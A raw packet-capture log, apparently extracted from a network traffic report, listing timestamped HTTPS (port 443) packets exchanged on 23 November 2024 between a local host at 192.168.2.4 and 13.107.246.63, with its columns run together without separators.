                                                                                                                                                                                                Nov 23, 2024 16:54:25.052156925 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.052202940 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.052226067 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:25.052237034 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.052242994 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:25.055465937 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.055491924 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:25.055577993 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.055747986 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:25.055763006 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.556762934 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.557271957 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.557322025 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.557847023 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.557862043 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.562463045 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.562973022 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.562995911 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.563469887 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.563477993 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.589906931 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.590291023 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.590333939 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.590667963 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.590679884 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.602118969 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.607850075 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.607861996 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.608239889 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.608243942 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.779059887 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.779628038 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.779658079 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:26.780060053 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:26.780066013 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.012747049 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.012928009 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.012986898 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.013083935 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.013112068 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.013123989 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.013133049 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.013962984 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014043093 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014101982 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014516115 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014516115 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014564037 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.014610052 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016138077 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016232014 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016314983 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016516924 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016551018 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016680956 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016716957 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016779900 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016900063 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.016915083 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055042028 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055113077 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055167913 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055356979 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055356979 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055377007 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.055397987 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.058064938 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.058118105 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.058202982 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.058374882 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.058396101 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066282034 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066345930 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066399097 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066540003 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066559076 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066571951 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.066577911 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.069020033 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.069056034 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.069128036 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.069492102 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.069502115 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.213728905 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.213818073 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.213905096 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.214097023 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.214118004 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.214128971 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.214135885 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.217320919 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.217367887 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:27.217456102 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.217638016 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:27.217652082 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.854547024 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.855011940 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.855045080 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.855612040 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.855617046 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.866653919 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.866956949 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.867010117 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.867299080 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.867307901 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.895287991 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.895639896 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.895678997 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.896190882 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.896199942 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.904690981 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.905015945 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.905026913 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.905375004 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.905379057 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.917473078 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.917812109 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.917845011 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:28.918163061 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:28.918167114 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.303831100 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.303992033 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.304085016 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.305414915 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.305434942 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.305470943 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.305480003 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.309073925 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.309112072 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.309174061 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.309298992 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.309305906 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.317766905 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.317837000 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.317900896 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.317994118 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.318028927 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.318064928 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.318079948 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.320039988 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.320077896 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.320152998 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.320278883 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.320290089 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373400927 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373481989 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373548985 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373703957 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373728991 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373743057 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.373749971 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374146938 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374197960 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374254942 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374342918 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374342918 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374382019 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374406099 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374596119 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374645948 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.374686956 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.375264883 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.375283003 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.375302076 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.375307083 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.376928091 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.376969099 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377003908 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377046108 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377053022 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377104044 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377155066 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377165079 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377230883 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377249002 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377640009 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377650976 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377711058 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377834082 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:29.377846956 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.109805107 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.116513014 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.116544962 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.117115021 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.117119074 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.169528008 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.170120955 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.170166969 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.170516014 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.170521021 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.193994045 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.194751978 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.194830894 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.195075989 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.195092916 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.199214935 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.199424982 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.199461937 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.199698925 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.199707031 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.202639103 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.202833891 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.202858925 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.203097105 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.203103065 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577305079 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577378035 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577605963 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577651978 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577651978 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577670097 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.577678919 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.580436945 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.580530882 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.580744982 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.580811024 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.580846071 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.628671885 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.628846884 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.629084110 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.629236937 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.629236937 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.629256010 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.629264116 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.631057978 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.631098986 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.631165981 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.631288052 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.631297112 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646274090 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646347046 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646418095 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646630049 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646631002 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646663904 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.646692038 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.648334980 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.648374081 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.648447037 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.648560047 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.648574114 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.650919914 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.650971889 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.651071072 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.651096106 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.651108980 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.651118040 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.651123047 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.652862072 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.652872086 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.652936935 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653047085 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653054953 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653060913 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653111935 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653151989 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653269053 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653274059 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653301954 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.653305054 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.654961109 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.654970884 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:31.655046940 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.655159950 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:31.655170918 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.394356966 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.394859076 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.394933939 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.395428896 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.395442963 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.434587002 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.435091972 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.435110092 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.435652971 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.435657978 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.478300095 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.478833914 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.478878975 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.479365110 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.479372025 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.504288912 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.504692078 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.504709005 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.505053997 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.505059958 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.840902090 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.840964079 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.841037035 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.841263056 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:33.841305017 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:33.841332912 CET49919443192.168.2.413.107.246.63
